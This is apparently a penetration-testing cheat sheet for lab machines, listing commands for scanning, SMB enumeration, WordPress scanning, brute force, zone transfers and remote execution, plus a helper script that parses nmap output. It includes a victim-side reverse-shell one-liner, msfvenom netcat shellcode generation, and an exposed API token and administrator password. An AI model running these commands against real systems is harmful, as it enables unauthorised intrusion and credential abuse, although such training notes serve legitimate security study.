# Methodology

[TOC]

Commands used.

# RECON

Full TCP sweep first (`--open` keeps only open ports in the grepable output, `-Pn -n` skip host discovery and DNS resolution, `--min-rate 5000` is fast but noisy):

`nmap -p- --open -sS --min-rate 5000 -Pn -n -vvv 10.10.10.3 -oG ports.gp`

Then a version and default-script scan against the open ports only:

`nmap -p21,22,139,445,3632 -sV --min-rate 5000 -sS -sC -Pn -n -vvv 10.10.10.3 -oN scan.txt`

Extract the open ports from nmap's grepable file as a comma-separated list ready for `-p`:

`cat ports.gp | grep -o "[0-9]*/open/tcp" | cut -d "/" -f1 | tr "\n" "," | sed "s/,$//"`

# SMB SCAN

## NULL SESSIONS

`crackmapexec smb 10.10.10.3 -u '' -p '' --shares`

Same thing from the Docker image (the flag is `--rm`, not `-rm`):

`docker run -it --rm byt3bl33d3r/crackmapexec smb 10.10.10.3 -u '' -p '' --shares`

# Web scanning

## WordPress

```
API: HyQRUJKHORgVY8YqjTiDhnab0JbnkS5pF10FCYCTtMM
wpscan --disable-tls-checks --url https://brainfuck.htb/ -e ap,u,dbe --api-token <your wpscan API token>
```

`-e ap,u,dbe` enumerates all plugins, users and database exports; `--disable-tls-checks` is needed when the site uses a self-signed certificate.

## Web server scan

`nikto -h http://<WEB SERVER>`

## Directory fuzzing with nmap

`nmap --script http-enum -p80 <IP>`

## Web technology detection

`whatweb <web server>`

# Generate shellcode

## metasploit

`msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.5 LPORT=443 -f python`

# Reverse Shell

## SSL

```bash
# Attacker: self-signed certificate, then a TLS listener (openssl or ncat, either one)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
# or
ncat --ssl -vv -l -p 4242

# Victim
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
```

# Password Cracking

## SSH KEY (RSA) CRACKING

```
ssh2john.py id_rsa > key.txt
john -w:rockyou.txt key.txt
```

# Exploit MS17-010 (manually, the simple way)

https://www.exploit-db.com/exploits/42315
https://redteamzone.com/EternalBlue/

# Run commands on a Windows machine remotely (useful for privesc)

`winexe -U {User}%{Password} //{HOST} '{command to run}'`

# Get a shell with psexec (Impacket's psexec.py)

`python psexec.py 'administrator:u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97`

# ABUSING THE HTTP PUT METHOD

https://www.hackingarticles.in/multiple-ways-to-exploiting-put-method/
https://www.ethicalhacker.net/forums/topic/http-header-put-delete-etc/

# List of tools for running commands on Windows machines over SMB

```
psexec
smbexec
wmiexec
winexe
```

# DNS enumeration

## Get NS records

`dig <domain> ns`

## Get MX records

`dig <domain> mx`

## AXFR attack (zone transfer)

`dig <domain> @<IP> axfr`

Only works when the name server allows zone transfers to arbitrary clients; a successful transfer dumps every record in the zone.

# Brute-force attacks

## HTTPS

`hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -v https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."`

Module argument format: `path:POST body with ^USER^/^PASS^ placeholders:string that appears in the response on a failed login`.

# Port Knocking

`python3 knock 10.10.10.43 571 290 911`

Hits the ports in the given order; the sequence must match the one the knock daemon expects before it opens the hidden port.
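The RECON one-liner above is what gets typed on the box; as an added example (not part of the original cheat sheet) the same extraction is turned into reusable shell functions that work per host and per port state, and emit the second nmap command line directly. The `-oG` file contents, the hosts and the ports are constructed here, not a real scan.

```bash
#!/usr/bin/env bash
# Added example: parse nmap grepable (-oG) output per host and build the
# follow-up scan command. Sample data below is constructed, not a real scan.

# sample_gnmap_file -> path of a temp file holding constructed -oG output.
# Includes a filtered port, a second host and a UDP entry so the filters matter.
sample_gnmap_file() {
  local f
  f="$(mktemp)"
  {
    printf '# Nmap 7.94 scan initiated as: nmap -p- --open -sS -oG ports.gp 10.10.10.3\n'
    printf 'Host: 10.10.10.3 ()\tStatus: Up\n'
    printf 'Host: 10.10.10.3 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3632/open/tcp//distccd///, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (65530)\n'
    printf 'Host: 10.10.10.4 ()\tPorts: 80/open/tcp//http///, 53/open/udp//domain///\n'
    printf '# Nmap done -- 2 IP addresses (2 hosts up) scanned in 5.00 seconds\n'
  } > "$f"
  printf '%s\n' "$f"
}

# ports_for_host FILE IP [STATE]
# Prints the TCP ports of IP in STATE (default: open) as "21,22,139" with no
# trailing comma. Only "Host:" lines whose second field is exactly IP count,
# so the scan's own comment lines and other hosts never leak in.
ports_for_host() {
  local file="$1" ip="$2" state="${3:-open}"
  awk -v ip="$ip" '$1 == "Host:" && $2 == ip' "$file" \
    | grep -o "[0-9]*/$state/tcp" \
    | cut -d/ -f1 \
    | sort -n -u \
    | paste -sd, -
}

# followup_scan FILE IP
# Prints the version/script scan command for the open ports of IP; returns 1
# (and prints nothing on stdout) when the host has no open TCP port.
followup_scan() {
  local file="$1" ip="$2" ports
  ports="$(ports_for_host "$file" "$ip")"
  if [ -z "$ports" ]; then
    printf 'no open tcp ports for %s in %s\n' "$ip" "$file" >&2
    return 1
  fi
  printf 'nmap -p%s -sV -sC -sS --min-rate 5000 -Pn -n -vvv %s -oN scan_%s.txt\n' \
    "$ports" "$ip" "$ip"
}

# Usage against the constructed sample
gp="$(sample_gnmap_file)"
ports_for_host "$gp" 10.10.10.3            # -> 21,22,139,445,3632
ports_for_host "$gp" 10.10.10.3 filtered   # -> 8080
followup_scan "$gp" 10.10.10.3
rm -f "$gp"
```

On a real engagement replace `sample_gnmap_file` with the `ports.gp` written by the first scan; `followup_scan` then prints the exact second command from the RECON section, which can be piped into `sh` or copied.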